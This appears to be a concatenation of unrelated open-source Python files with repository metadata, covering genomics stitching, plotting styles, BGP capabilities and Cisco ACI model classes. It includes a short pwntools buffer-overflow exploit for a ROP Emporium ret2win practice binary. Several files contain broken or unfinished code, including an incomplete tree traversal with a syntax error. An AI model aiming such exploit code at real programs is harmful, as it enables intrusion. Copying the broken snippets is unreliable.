/pepper/modules/python/Stitch.py
0734eb61c124c59b09ff199496d23bcc7754cb4f
[ "MIT" ]
permissive
kishwarshafin/pepper
20760a2a820d77ca5fc798957f0de658e936dcca
30c8907501b254bb72d8f64dfb8cf54a1b7a60eb
refs/heads/r0.8
2023-08-04T07:03:53.564606
2022-07-08T18:22:01
2022-07-08T18:22:01
185,895,043
219
41
MIT
2023-07-22T05:17:46
2019-05-10T01:13:11
Python
UTF-8
Python
false
false
5,521
py
import h5py import sys from os.path import isfile, join from os import listdir import concurrent.futures import numpy as np from collections import defaultdict import operator from pepper.modules.python.Options import ImageSizeOptions from datetime import datetime label_decoder = {1: 'A', 2: 'C', 3: 'G', 4: 'T', 0: ''} MIN_SEQUENCE_REQUIRED_FOR_MULTITHREADING = 2 def get_file_paths_from_directory(directory_path): """ Returns all paths of files given a directory path :param directory_path: Path to the directory :return: A list of paths of files """ file_paths = [join(directory_path, file) for file in listdir(directory_path) if isfile(join(directory_path, file)) and file[-2:] == 'h5'] return file_paths def chunks(file_names, threads): """Yield successive n-sized chunks from l.""" chunks = [] for i in range(0, len(file_names), threads): chunks.append(file_names[i:i + threads]) return chunks def small_chunk_stitch(contig, small_chunk_keys): # for chunk_key in small_chunk_keys: base_prediction_dictionary = defaultdict() # phred_score_dictionary = defaultdict() all_positions = set() # ignore first 2 * MIN_IMAGE_OVERLAP bases as they are just overlaps buffer_positions = ImageSizeOptions.MIN_IMAGE_OVERLAP * 2 for file_name, contig_name, _st, _end in small_chunk_keys: chunk_name = contig_name + '-' + str(_st) + '-' + str(_end) with h5py.File(file_name, 'r') as hdf5_file: smaller_chunks = set(hdf5_file['predictions'][contig][chunk_name].keys()) - {'contig_start', 'contig_end'} smaller_chunks = sorted(smaller_chunks) for i, chunk in enumerate(smaller_chunks): with h5py.File(file_name, 'r') as hdf5_file: bases = hdf5_file['predictions'][contig][chunk_name][chunk]['bases'][()] # phred_score = hdf5_file['predictions'][contig][chunk_name][chunk]['phred_score'][()] positions = hdf5_file['predictions'][contig][chunk_name][chunk]['position'][()] indices = hdf5_file['predictions'][contig][chunk_name][chunk]['index'][()] positions = np.array(positions, dtype=np.int64) base_predictions = np.array(bases, dtype=np.int) # if _st == 107900: # print(positions) for pos, indx, base_pred in zip(positions, indices, base_predictions): # not take the first buffer bases for every chunk that has an overlap to the last chunk if _st > 0 and pos <= _st + buffer_positions: continue if indx < 0 or pos < 0: continue base_prediction_dictionary[(pos, indx)] = base_pred # phred_score_dictionary[(pos, indx)] = base_score + 33 all_positions.add((pos, indx)) if len(all_positions) == 0: return -1, -1, '' pos_list = sorted(list(all_positions), key=lambda element: (element[0], element[1])) dict_fetch = operator.itemgetter(*pos_list) # weird but python has no casting between np.int64 to list if len(pos_list) > 1: predicted_base_labels = list(dict_fetch(base_prediction_dictionary)) # predicted_phred_scores = list(dict_fetch(phred_score_dictionary)) else: predicted_base_labels = [dict_fetch(base_prediction_dictionary)] # predicted_phred_scores = [dict_fetch(phred_score_dictionary)] sequence = ''.join([label_decoder[base] for base in predicted_base_labels]) # phred_score = ''.join([chr(phred_score) for base, phred_score in zip(predicted_base_labels, predicted_phred_scores) if base != 0]) first_pos = pos_list[0][0] last_pos = pos_list[-1][0] return first_pos, last_pos, sequence def create_consensus_sequence(contig, sequence_chunk_keys, threads): sequence_chunk_keys = sorted(sequence_chunk_keys, key=lambda element: (element[1])) sequence_chunk_key_list = list() for file_name, sequence_chunk_key, contig_start, contig_end in sequence_chunk_keys: sequence_chunk_key_list.append((file_name, contig, int(contig_start), int(contig_end))) sequence_chunk_key_list = sorted(sequence_chunk_key_list, key=lambda element: (element[2], element[3])) sequence_chunks = list() # generate the dictionary in parallel with concurrent.futures.ProcessPoolExecutor(max_workers=threads) as executor: file_chunks = chunks(sequence_chunk_key_list, max(MIN_SEQUENCE_REQUIRED_FOR_MULTITHREADING, int(len(sequence_chunk_key_list) / threads) + 1)) futures = [executor.submit(small_chunk_stitch, contig, chunk) for chunk in file_chunks] for fut in concurrent.futures.as_completed(futures): if fut.exception() is None: first_pos, last_pos, sequence = fut.result() if first_pos != -1 and last_pos != -1: sequence_chunks.append((first_pos, last_pos, sequence)) else: sys.stderr.write("[" + str(datetime.now().strftime('%m-%d-%Y %H:%M:%S')) + "] ERROR: " + str(fut.exception()) + "\n") fut._result = None # python issue 27144 sequence_chunks = sorted(sequence_chunks, key=lambda element: (element[0], element[1])) stitched_sequence = '' for first_pos, last_pos, sequence in sequence_chunks: stitched_sequence = stitched_sequence + sequence return stitched_sequence
[ "kishwar.shafin@gmail.com" ]
kishwar.shafin@gmail.com
6557d0f91c736194fd7b901916bf5c217d93a5c8
e2f20ded13f4877248b2db7d5251c701bc586745
/hggStyle.py
b743da4cb04a28f2693918482b6b945763ab6a92
[]
no_license
flashgg-validation/plotZeeValidation
965f1c8c8dd5aa5e7250abad04add18a48955ee8
0c845060d7498ce92780839ec2da46515145abf3
refs/heads/master
2021-01-17T07:52:56.292151
2017-02-13T15:18:21
2017-02-13T15:18:21
60,186,146
0
2
null
2016-06-03T15:03:54
2016-06-01T14:53:36
Python
UTF-8
Python
false
false
1,451
py
import ROOT def hggStyle(): hggStyle = ROOT.TStyle("hggPaperStyle","Hgg Paper Style") hggStyle.SetFrameFillColor(0) hggStyle.SetStatColor(0) hggStyle.SetOptStat(0) hggStyle.SetTitleFillColor(0) hggStyle.SetCanvasBorderMode(0) hggStyle.SetPadBorderMode(0) hggStyle.SetFrameBorderMode(0) hggStyle.SetPadColor(ROOT.kWhite) hggStyle.SetCanvasColor(ROOT.kWhite) hggStyle.SetCanvasDefH(600) #Height of canvas hggStyle.SetCanvasDefW(600) #Width of canvas hggStyle.SetCanvasDefX(0) #POsition on screen hggStyle.SetCanvasDefY(0) hggStyle.SetPadLeftMargin(0.13)#0.16) hggStyle.SetPadRightMargin(0.1)#0.02) hggStyle.SetPadTopMargin(0.085)#0.02) hggStyle.SetPadBottomMargin(0.12)#0.02) # For hgg axis titles: hggStyle.SetTitleColor(1, "XYZ") hggStyle.SetTitleFont(42, "XYZ") hggStyle.SetTitleSize(0.05, "XYZ") hggStyle.SetTitleXOffset(0.95)#0.9) hggStyle.SetTitleYOffset(1.15) # => 1.15 if exponents # For hgg axis labels: hggStyle.SetLabelColor(1, "XYZ") hggStyle.SetLabelFont(42, "XYZ") hggStyle.SetLabelOffset(0.007, "XYZ") hggStyle.SetLabelSize(0.04, "XYZ") # Legends hggStyle.SetLegendBorderSize(0) hggStyle.SetLegendFillColor(ROOT.kWhite) hggStyle.SetLegendFont(42) hggStyle.SetFillColor(10) # Nothing for now hggStyle.SetTextFont(42) hggStyle.SetTextSize(0.03) hggStyle.cd()
[ "matteosan1@gmail.com" ]
matteosan1@gmail.com
868f76281959f6253538cf380f9a2a1802982d27
80bbc5a4a5ebbf1be75afc8cd0102dcd60a6a081
/huaula/github.py
3aa2e1ee9344de60626d53cb4631a59a37e5ffcd
[ "MIT" ]
permissive
renzon/hu
642dc6bac9501eaee99623108d4c5c0aa04a1c52
4147f38e138e73db54cd9a81812795e793bdb921
refs/heads/master
2021-01-01T05:01:03.889460
2016-05-13T20:55:08
2016-05-13T20:55:08
58,227,578
2
1
MIT
2019-10-22T18:03:47
2016-05-06T18:38:25
Python
UTF-8
Python
false
false
501
py
import json from os import path import requests diretorio_dese_arquivo = path.dirname(__file__) diretorio_huaula = path.join(diretorio_dese_arquivo, '..') diretorio_do_projeto = path.abspath(diretorio_huaula) import sys sys.path.append(diretorio_do_projeto) from huaula import dunder_main def buscar_avatar(nome): r = requests.get('https://api.github.com/users/{}'.format(nome),) dados = json.loads(r.text) dunder_main.b return dados['avatar_url'] print(buscar_avatar('renzon'))
[ "renzon@gmail.com" ]
renzon@gmail.com
9e677bece07b63a388f96d5c6dd85353008dfab7
531c5c6fab45a69c36b716196c713fa1b67cc88f
/0x00_ret2win/32-bit/exploit.py
11229c37cbfd158ba3eb985b9b7c4fcab0a002ed
[]
no_license
youngkao/ROP_Emporium
b79a06bb97db9fc3d156c064a84f35e585493fa5
d4ca8b99bf2960e2c867f3360c901e649a614f8c
refs/heads/master
2022-02-19T04:05:33.706883
2019-09-25T12:23:39
2019-09-25T12:23:39
null
0
0
null
null
null
null
UTF-8
Python
false
false
362
py
import sys; sys.path.append("../..") import shared_pwn from pwn import * BINARY_NAME = "ret2win32" BUFFER_LEN = 44 io = process(f"./{BINARY_NAME}") junk = b"\x90" * BUFFER_LEN # Pointers win_addr = p32(0x08048659) # Payload creation payload = b"" payload += junk payload += win_addr io.recvuntil("> ") io.send(payload) io.send("\n") shared_pwn._recvall(io)
[ "afray@protonmail.com" ]
afray@protonmail.com
c036217771fed754eb3e8ccbcefae4fe4921134a
9743d5fd24822f79c156ad112229e25adb9ed6f6
/xai/brain/wordbase/adjectives/_variegated.py
066dd80491cf63f80a64cabdac0ff24abbe116a3
[ "MIT" ]
permissive
cash2one/xai
de7adad1758f50dd6786bf0111e71a903f039b64
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
refs/heads/master
2021-01-19T12:33:54.964379
2017-01-28T02:00:50
2017-01-28T02:00:50
null
0
0
null
null
null
null
UTF-8
Python
false
false
414
py
#calss header class _VARIEGATED(): def __init__(self,): self.name = "VARIEGATED" self.definitions = [u'having a pattern of different colours or marks: '] self.parents = [] self.childen = [] self.properties = [] self.jsondata = {} self.specie = 'adjectives' def run(self, obj1, obj2): self.jsondata[obj2] = {} self.jsondata[obj2]['properties'] = self.name.lower() return self.jsondata
[ "xingwang1991@gmail.com" ]
xingwang1991@gmail.com
1b0da8a0baa221478bc19fb0a1088a711ad3a254
6ea679ac5cdaf5e6f8d9584194ad74440762eea3
/lib/exabgp/bgp/message/open/capability/capability.py
7a6fccdf09ef4c9778a8b12e6ea3e2e5c7eff9fa
[]
no_license
h-naoto/exabgp
0d7b307d9e23e50a295bc70283141c58f9ef83f1
05a96e99c35256160df8923e7a17f57e3ca36e3d
refs/heads/master
2021-01-15T18:04:42.333066
2015-02-05T08:11:37
2015-02-05T08:11:37
30,223,499
0
0
null
2015-02-03T03:48:25
2015-02-03T03:48:25
null
UTF-8
Python
false
false
4,190
py
# encoding: utf-8 """ capability.py Created by Thomas Mangin on 2012-07-17. Copyright (c) 2009-2015 Exa Networks. All rights reserved. """ from exabgp.bgp.message.notification import Notify # =================================================================== Capability # class Capability (object): class CODE (int): __slots__ = [] RESERVED = 0x00 # [RFC5492] MULTIPROTOCOL = 0x01 # [RFC2858] ROUTE_REFRESH = 0x02 # [RFC2918] OUTBOUND_ROUTE_FILTERING = 0x03 # [RFC5291] MULTIPLE_ROUTES = 0x04 # [RFC3107] EXTENDED_NEXT_HOP = 0x05 # [RFC5549] # 6-63 Unassigned GRACEFUL_RESTART = 0x40 # [RFC4724] FOUR_BYTES_ASN = 0x41 # [RFC4893] # 66 Deprecated DYNAMIC_CAPABILITY = 0x43 # [Chen] MULTISESSION = 0x44 # [draft-ietf-idr-bgp-multisession] ADD_PATH = 0x45 # [draft-ietf-idr-add-paths] ENHANCED_ROUTE_REFRESH = 0x46 # [draft-ietf-idr-bgp-enhanced-route-refresh] OPERATIONAL = 0x47 # ExaBGP only ... # 70-127 Unassigned ROUTE_REFRESH_CISCO = 0x80 # I Can only find reference to this in the router logs # 128-255 Reserved for Private Use [RFC5492] MULTISESSION_CISCO = 0x83 # What Cisco really use for Multisession (yes this is a reserved range in prod !) EXTENDED_MESSAGE = -1 # No yet defined by draft http://tools.ietf.org/html/draft-ietf-idr-extended-messages-02.txt unassigned = range(70,128) reserved = range(128,256) # Internal AIGP = 0xFF00 names = { RESERVED: 'reserved', MULTIPROTOCOL: 'multiprotocol', ROUTE_REFRESH: 'route-refresh', OUTBOUND_ROUTE_FILTERING: 'outbound-route-filtering', MULTIPLE_ROUTES: 'multiple-routes', EXTENDED_NEXT_HOP: 'extended-next-hop', GRACEFUL_RESTART: 'graceful-restart', FOUR_BYTES_ASN: 'asn4', DYNAMIC_CAPABILITY: 'dynamic-capability', MULTISESSION: 'multi-session', ADD_PATH: 'add-path', ENHANCED_ROUTE_REFRESH: 'enhanced-route-refresh', OPERATIONAL: 'operational', ROUTE_REFRESH_CISCO: 'cisco-route-refresh', MULTISESSION_CISCO: 'cisco-multi-sesion', AIGP: 'aigp', } def __str__ (self): name = self.names.get(self,None) if name is None: if self in Capability.CODE.unassigned: return 'unassigned-%s' % hex(self) if self in Capability.CODE.reserved: return 'reserved-%s' % hex(self) return 'capability-%s' % hex(self) return name def __repr__ (self): return str(self) @classmethod def name (cls,self): name = cls.names.get(self,None) if name is None: if self in Capability.CODE.unassigned: return 'unassigned-%s' % hex(self) if self in Capability.CODE.reserved: return 'reserved-%s' % hex(self) return name registered_capability = dict() _fallback_capability = None @staticmethod def hex (data): return '0x' + ''.join('%02x' % ord(_) for _ in data) @classmethod def fallback_capability (cls, imp): if cls._fallback_capability is not None: raise RuntimeError('only one fallback function can be registered') cls._fallback_capability = imp @staticmethod def register_capability (klass,capability=None): # ID is defined by all the subclasses - otherwise they do not work :) what = klass.ID if capability is None else capability # pylint: disable=E1101 if what in klass.registered_capability: raise RuntimeError('only one class can be registered per capability') klass.registered_capability[what] = klass @classmethod def klass (cls,what): if what in cls.registered_capability: kls = cls.registered_capability[what] kls.ID = what return kls if cls._fallback_capability: return cls._fallback_capability raise Notify (2,4,'can not handle capability %s' % what) @classmethod def unpack (cls,capability,capabilities,data): instance = capabilities.get(capability,Capability.klass(capability)()) return cls.klass(capability).unpack_capability(instance,data,capability)
[ "thomas.mangin@exa-networks.co.uk" ]
thomas.mangin@exa-networks.co.uk
2afaad96ff00e3e3de0b221b11e2f3db5bd578bf
d1f971b9fa0edfa633b62887cf9d173d6a86a440
/data_structures_and_algorithms/exercises/Recursions/sum_digits_iterative.py
d6529b86b2ccb00c3aef778d5028fdab5cc12eec
[]
no_license
papan36125/python_exercises
d45cf434c15aa46e10967c13fbe9658915826478
748eed2b19bccf4b5c700075675de87c7c70c46e
refs/heads/master
2020-04-28T10:01:10.361108
2019-05-10T13:45:35
2019-05-10T13:45:35
175,187,760
0
0
null
null
null
null
UTF-8
Python
false
false
288
py
# Linear - O(N) def sum_digits(n): if n < 0: ValueError("Inputs 0 or greater only!") result = 0 while n is not 0: result += n % 10 n = n // 10 return result + n sum_digits(12) # 1 + 2 # 3 sum_digits(552) # 5 + 5 + 2 # 12 sum_digits(123456789) # 1 + 2 + 3 + 4... # 45
[ "noreply@github.com" ]
papan36125.noreply@github.com
80bbc6e2f6bcd9d7b41013d8b2c550e98e0920ed
da853ef2c9946344ae34829355a507052f1af411
/PycharmProjects/tuples.py
cf7ab20f7eeaa1f522356d52123c7c22e400e309
[]
no_license
SubhamSingh1/star
c4f3d2ac0470e81847fef4436c0cbd3e1ea9bf6c
33531c1f224e0a553d93d877724db673bf6941db
refs/heads/master
2022-12-21T13:27:03.969571
2021-10-01T07:31:17
2021-10-01T07:31:17
235,774,208
0
0
null
2022-12-14T11:40:12
2020-01-23T10:43:20
Python
UTF-8
Python
false
false
57
py
tuple1 = (1,2,3,4,5) print(tuple1[-1]) print(tuple1[-4])
[ "60218236+SubhamSingh1@users.noreply.github.com" ]
60218236+SubhamSingh1@users.noreply.github.com
51278c6c7c276bdac6699685e2380d14239b4a52
52b5773617a1b972a905de4d692540d26ff74926
/.history/binaryTree2_20200617161602.py
904a5a72342f25c5640e14213b27638d3386851d
[]
no_license
MaryanneNjeri/pythonModules
56f54bf098ae58ea069bf33f11ae94fa8eedcabc
f4e56b1e4dda2349267af634a46f6b9df6686020
refs/heads/master
2022-12-16T02:59:19.896129
2020-09-11T12:05:22
2020-09-11T12:05:22
null
0
0
null
null
null
null
UTF-8
Python
false
false
1,105
py
# Create a node and assign a value to the node # A tree node contains data then pointer to left child and pointer to right child class Node: def __init__(self,data): # designate one node as root self.data = data # then the two others as child nodes self.left = None self.right = None def inorder(root,newArr): if root: # Traverse left inorder(root.left,newArr) newArr.append(root.data) inorder(root.right,newArr) print(newArr) return newArr def morris_traversal(root): # function for iterative inorder tree traversal current = root while current is not None: # do the following if current.left is None: yield current.data else: # find the current in order predecessor of current pre = current.left while pre.right is not None root = Node(1) root.left = Node(2) root.right = Node(3) root.left.right = Node(4) root.left.left = Node(7) print(inorder(root,[]))
[ "mary.jereh@gmail.com" ]
mary.jereh@gmail.com
a7b54272021537b38792b78c662b99775170cab6
24fe1f54fee3a3df952ca26cce839cc18124357a
/servicegraph/lib/python2.7/site-packages/acimodel-4.0_3d-py2.7.egg/cobra/modelimpl/eqpt/ingrerrpktshist.py
dbdeaffa4a8787bcd1449adb1fd085f6c88d4156
[]
no_license
aperiyed/servicegraph-cloudcenter
4b8dc9e776f6814cf07fe966fbd4a3481d0f45ff
9eb7975f2f6835e1c0528563a771526896306392
refs/heads/master
2023-05-10T17:27:18.022381
2020-01-20T09:18:28
2020-01-20T09:18:28
235,065,676
0
0
null
2023-05-01T21:19:14
2020-01-20T09:36:37
Python
UTF-8
Python
false
false
24,286
py
# coding=UTF-8 # ********************************************************************** # Copyright (c) 2013-2019 Cisco Systems, Inc. All rights reserved # written by zen warriors, do not modify! # ********************************************************************** from cobra.mit.meta import ClassMeta from cobra.mit.meta import StatsClassMeta from cobra.mit.meta import CounterMeta from cobra.mit.meta import PropMeta from cobra.mit.meta import Category from cobra.mit.meta import SourceRelationMeta from cobra.mit.meta import NamedSourceRelationMeta from cobra.mit.meta import TargetRelationMeta from cobra.mit.meta import DeploymentPathMeta, DeploymentCategory from cobra.model.category import MoCategory, PropCategory, CounterCategory from cobra.mit.mo import Mo # ################################################## class IngrErrPktsHist(Mo): meta = StatsClassMeta("cobra.model.eqpt.IngrErrPktsHist", "Ingress Error Packets") counter = CounterMeta("crcCountRate", CounterCategory.GAUGE, "packets-per-second", "CRC Align Errored Packets rate") counter._propRefs[PropCategory.IMPLICIT_MIN] = "crcCountRateMin" counter._propRefs[PropCategory.IMPLICIT_MAX] = "crcCountRateMax" counter._propRefs[PropCategory.IMPLICIT_AVG] = "crcCountRateAvg" counter._propRefs[PropCategory.IMPLICIT_SUSPECT] = "crcCountRateSpct" counter._propRefs[PropCategory.IMPLICIT_THRESHOLDED] = "crcCountRateThr" counter._propRefs[PropCategory.IMPLICIT_TREND] = "crcCountRateTr" meta._counters.append(counter) counter = CounterMeta("crcCount", CounterCategory.COUNTER, "packets", "CRC Align Errored Packets") counter._propRefs[PropCategory.IMPLICIT_CUMULATIVE] = "crcCountCum" counter._propRefs[PropCategory.IMPLICIT_PERIODIC] = "crcCountPer" counter._propRefs[PropCategory.IMPLICIT_MIN] = "crcCountMin" counter._propRefs[PropCategory.IMPLICIT_MAX] = "crcCountMax" counter._propRefs[PropCategory.IMPLICIT_AVG] = "crcCountAvg" counter._propRefs[PropCategory.IMPLICIT_SUSPECT] = "crcCountSpct" counter._propRefs[PropCategory.IMPLICIT_THRESHOLDED] = "crcCountThr" counter._propRefs[PropCategory.IMPLICIT_TREND] = "crcCountTr" counter._propRefs[PropCategory.IMPLICIT_RATE] = "crcCountRate" meta._counters.append(counter) counter = CounterMeta("crc", CounterCategory.GAUGE, "percentage", "CRC Align Errors") counter._propRefs[PropCategory.IMPLICIT_MIN] = "crcMin" counter._propRefs[PropCategory.IMPLICIT_MAX] = "crcMax" counter._propRefs[PropCategory.IMPLICIT_AVG] = "crcAvg" counter._propRefs[PropCategory.IMPLICIT_SUSPECT] = "crcSpct" counter._propRefs[PropCategory.IMPLICIT_THRESHOLDED] = "crcThr" counter._propRefs[PropCategory.IMPLICIT_TREND] = "crcTr" meta._counters.append(counter) meta.isAbstract = True meta.moClassName = "eqptIngrErrPktsHist" meta.moClassName = "eqptIngrErrPktsHist" meta.rnFormat = "" meta.category = MoCategory.STATS_HISTORY meta.label = "historical Ingress Error Packets stats" meta.writeAccessMask = 0x1 meta.readAccessMask = 0x1 meta.isDomainable = False meta.isReadOnly = True meta.isConfigurable = False meta.isDeletable = False meta.isContextRoot = False meta.superClasses.add("cobra.model.stats.Item") meta.superClasses.add("cobra.model.stats.Hist") meta.concreteSubClasses.add("cobra.model.eqpt.IngrErrPktsHist1mo") meta.concreteSubClasses.add("cobra.model.eqpt.IngrErrPktsHist1w") meta.concreteSubClasses.add("cobra.model.eqpt.IngrErrPktsHist1qtr") meta.concreteSubClasses.add("cobra.model.eqpt.IngrErrPktsHist15min") meta.concreteSubClasses.add("cobra.model.eqpt.IngrErrPktsHist5min") meta.concreteSubClasses.add("cobra.model.eqpt.IngrErrPktsHist1year") meta.concreteSubClasses.add("cobra.model.eqpt.IngrErrPktsHist1d") meta.concreteSubClasses.add("cobra.model.eqpt.IngrErrPktsHist1h") meta.rnPrefixes = [ ] prop = PropMeta("str", "childAction", "childAction", 4, PropCategory.CHILD_ACTION) prop.label = "None" prop.isImplicit = True prop.isAdmin = True prop._addConstant("deleteAll", "deleteall", 16384) prop._addConstant("deleteNonPresent", "deletenonpresent", 8192) prop._addConstant("ignore", "ignore", 4096) meta.props.add("childAction", prop) prop = PropMeta("str", "cnt", "cnt", 16212, PropCategory.REGULAR) prop.label = "Number of Collections During this Interval" prop.isImplicit = True prop.isAdmin = True meta.props.add("cnt", prop) prop = PropMeta("str", "crcAvg", "crcAvg", 43586, PropCategory.IMPLICIT_AVG) prop.label = "CRC Align Errors average value" prop.isOper = True prop.isStats = True meta.props.add("crcAvg", prop) prop = PropMeta("str", "crcCountAvg", "crcCountAvg", 45230, PropCategory.IMPLICIT_AVG) prop.label = "CRC Align Errored Packets average value" prop.isOper = True prop.isStats = True meta.props.add("crcCountAvg", prop) prop = PropMeta("str", "crcCountCum", "crcCountCum", 45226, PropCategory.IMPLICIT_CUMULATIVE) prop.label = "CRC Align Errored Packets cumulative" prop.isOper = True prop.isStats = True meta.props.add("crcCountCum", prop) prop = PropMeta("str", "crcCountMax", "crcCountMax", 45229, PropCategory.IMPLICIT_MAX) prop.label = "CRC Align Errored Packets maximum value" prop.isOper = True prop.isStats = True meta.props.add("crcCountMax", prop) prop = PropMeta("str", "crcCountMin", "crcCountMin", 45228, PropCategory.IMPLICIT_MIN) prop.label = "CRC Align Errored Packets minimum value" prop.isOper = True prop.isStats = True meta.props.add("crcCountMin", prop) prop = PropMeta("str", "crcCountPer", "crcCountPer", 45227, PropCategory.IMPLICIT_PERIODIC) prop.label = "CRC Align Errored Packets periodic" prop.isOper = True prop.isStats = True meta.props.add("crcCountPer", prop) prop = PropMeta("str", "crcCountRate", "crcCountRate", 45234, PropCategory.IMPLICIT_RATE) prop.label = "CRC Align Errored Packets rate" prop.isOper = True prop.isStats = True meta.props.add("crcCountRate", prop) prop = PropMeta("str", "crcCountRateAvg", "crcCountRateAvg", 45246, PropCategory.IMPLICIT_AVG) prop.label = "CRC Align Errored Packets rate average value" prop.isOper = True prop.isStats = True meta.props.add("crcCountRateAvg", prop) prop = PropMeta("str", "crcCountRateMax", "crcCountRateMax", 45245, PropCategory.IMPLICIT_MAX) prop.label = "CRC Align Errored Packets rate maximum value" prop.isOper = True prop.isStats = True meta.props.add("crcCountRateMax", prop) prop = PropMeta("str", "crcCountRateMin", "crcCountRateMin", 45244, PropCategory.IMPLICIT_MIN) prop.label = "CRC Align Errored Packets rate minimum value" prop.isOper = True prop.isStats = True meta.props.add("crcCountRateMin", prop) prop = PropMeta("str", "crcCountRateSpct", "crcCountRateSpct", 45247, PropCategory.IMPLICIT_SUSPECT) prop.label = "CRC Align Errored Packets rate suspect count" prop.isOper = True prop.isStats = True meta.props.add("crcCountRateSpct", prop) prop = PropMeta("str", "crcCountRateThr", "crcCountRateThr", 45248, PropCategory.IMPLICIT_THRESHOLDED) prop.label = "CRC Align Errored Packets rate thresholded flags" prop.isOper = True prop.isStats = True prop.defaultValue = 0 prop.defaultValueStr = "unspecified" prop._addConstant("avgCrit", "avg-severity-critical", 2199023255552) prop._addConstant("avgHigh", "avg-crossed-high-threshold", 68719476736) prop._addConstant("avgLow", "avg-crossed-low-threshold", 137438953472) prop._addConstant("avgMajor", "avg-severity-major", 1099511627776) prop._addConstant("avgMinor", "avg-severity-minor", 549755813888) prop._addConstant("avgRecovering", "avg-recovering", 34359738368) prop._addConstant("avgWarn", "avg-severity-warning", 274877906944) prop._addConstant("cumulativeCrit", "cumulative-severity-critical", 8192) prop._addConstant("cumulativeHigh", "cumulative-crossed-high-threshold", 256) prop._addConstant("cumulativeLow", "cumulative-crossed-low-threshold", 512) prop._addConstant("cumulativeMajor", "cumulative-severity-major", 4096) prop._addConstant("cumulativeMinor", "cumulative-severity-minor", 2048) prop._addConstant("cumulativeRecovering", "cumulative-recovering", 128) prop._addConstant("cumulativeWarn", "cumulative-severity-warning", 1024) prop._addConstant("lastReadingCrit", "lastreading-severity-critical", 64) prop._addConstant("lastReadingHigh", "lastreading-crossed-high-threshold", 2) prop._addConstant("lastReadingLow", "lastreading-crossed-low-threshold", 4) prop._addConstant("lastReadingMajor", "lastreading-severity-major", 32) prop._addConstant("lastReadingMinor", "lastreading-severity-minor", 16) prop._addConstant("lastReadingRecovering", "lastreading-recovering", 1) prop._addConstant("lastReadingWarn", "lastreading-severity-warning", 8) prop._addConstant("maxCrit", "max-severity-critical", 17179869184) prop._addConstant("maxHigh", "max-crossed-high-threshold", 536870912) prop._addConstant("maxLow", "max-crossed-low-threshold", 1073741824) prop._addConstant("maxMajor", "max-severity-major", 8589934592) prop._addConstant("maxMinor", "max-severity-minor", 4294967296) prop._addConstant("maxRecovering", "max-recovering", 268435456) prop._addConstant("maxWarn", "max-severity-warning", 2147483648) prop._addConstant("minCrit", "min-severity-critical", 134217728) prop._addConstant("minHigh", "min-crossed-high-threshold", 4194304) prop._addConstant("minLow", "min-crossed-low-threshold", 8388608) prop._addConstant("minMajor", "min-severity-major", 67108864) prop._addConstant("minMinor", "min-severity-minor", 33554432) prop._addConstant("minRecovering", "min-recovering", 2097152) prop._addConstant("minWarn", "min-severity-warning", 16777216) prop._addConstant("periodicCrit", "periodic-severity-critical", 1048576) prop._addConstant("periodicHigh", "periodic-crossed-high-threshold", 32768) prop._addConstant("periodicLow", "periodic-crossed-low-threshold", 65536) prop._addConstant("periodicMajor", "periodic-severity-major", 524288) prop._addConstant("periodicMinor", "periodic-severity-minor", 262144) prop._addConstant("periodicRecovering", "periodic-recovering", 16384) prop._addConstant("periodicWarn", "periodic-severity-warning", 131072) prop._addConstant("rateCrit", "rate-severity-critical", 36028797018963968) prop._addConstant("rateHigh", "rate-crossed-high-threshold", 1125899906842624) prop._addConstant("rateLow", "rate-crossed-low-threshold", 2251799813685248) prop._addConstant("rateMajor", "rate-severity-major", 18014398509481984) prop._addConstant("rateMinor", "rate-severity-minor", 9007199254740992) prop._addConstant("rateRecovering", "rate-recovering", 562949953421312) prop._addConstant("rateWarn", "rate-severity-warning", 4503599627370496) prop._addConstant("trendCrit", "trend-severity-critical", 281474976710656) prop._addConstant("trendHigh", "trend-crossed-high-threshold", 8796093022208) prop._addConstant("trendLow", "trend-crossed-low-threshold", 17592186044416) prop._addConstant("trendMajor", "trend-severity-major", 140737488355328) prop._addConstant("trendMinor", "trend-severity-minor", 70368744177664) prop._addConstant("trendRecovering", "trend-recovering", 4398046511104) prop._addConstant("trendWarn", "trend-severity-warning", 35184372088832) prop._addConstant("unspecified", None, 0) meta.props.add("crcCountRateThr", prop) prop = PropMeta("str", "crcCountRateTr", "crcCountRateTr", 45249, PropCategory.IMPLICIT_TREND) prop.label = "CRC Align Errored Packets rate trend" prop.isOper = True prop.isStats = True meta.props.add("crcCountRateTr", prop) prop = PropMeta("str", "crcCountSpct", "crcCountSpct", 45231, PropCategory.IMPLICIT_SUSPECT) prop.label = "CRC Align Errored Packets suspect count" prop.isOper = True prop.isStats = True meta.props.add("crcCountSpct", prop) prop = PropMeta("str", "crcCountThr", "crcCountThr", 45232, PropCategory.IMPLICIT_THRESHOLDED) prop.label = "CRC Align Errored Packets thresholded flags" prop.isOper = True prop.isStats = True prop.defaultValue = 0 prop.defaultValueStr = "unspecified" prop._addConstant("avgCrit", "avg-severity-critical", 2199023255552) prop._addConstant("avgHigh", "avg-crossed-high-threshold", 68719476736) prop._addConstant("avgLow", "avg-crossed-low-threshold", 137438953472) prop._addConstant("avgMajor", "avg-severity-major", 1099511627776) prop._addConstant("avgMinor", "avg-severity-minor", 549755813888) prop._addConstant("avgRecovering", "avg-recovering", 34359738368) prop._addConstant("avgWarn", "avg-severity-warning", 274877906944) prop._addConstant("cumulativeCrit", "cumulative-severity-critical", 8192) prop._addConstant("cumulativeHigh", "cumulative-crossed-high-threshold", 256) prop._addConstant("cumulativeLow", "cumulative-crossed-low-threshold", 512) prop._addConstant("cumulativeMajor", "cumulative-severity-major", 4096) prop._addConstant("cumulativeMinor", "cumulative-severity-minor", 2048) prop._addConstant("cumulativeRecovering", "cumulative-recovering", 128) prop._addConstant("cumulativeWarn", "cumulative-severity-warning", 1024) prop._addConstant("lastReadingCrit", "lastreading-severity-critical", 64) prop._addConstant("lastReadingHigh", "lastreading-crossed-high-threshold", 2) prop._addConstant("lastReadingLow", "lastreading-crossed-low-threshold", 4) prop._addConstant("lastReadingMajor", "lastreading-severity-major", 32) prop._addConstant("lastReadingMinor", "lastreading-severity-minor", 16) prop._addConstant("lastReadingRecovering", "lastreading-recovering", 1) prop._addConstant("lastReadingWarn", "lastreading-severity-warning", 8) prop._addConstant("maxCrit", "max-severity-critical", 17179869184) prop._addConstant("maxHigh", "max-crossed-high-threshold", 536870912) prop._addConstant("maxLow", "max-crossed-low-threshold", 1073741824) prop._addConstant("maxMajor", "max-severity-major", 8589934592) prop._addConstant("maxMinor", "max-severity-minor", 4294967296) prop._addConstant("maxRecovering", "max-recovering", 268435456) 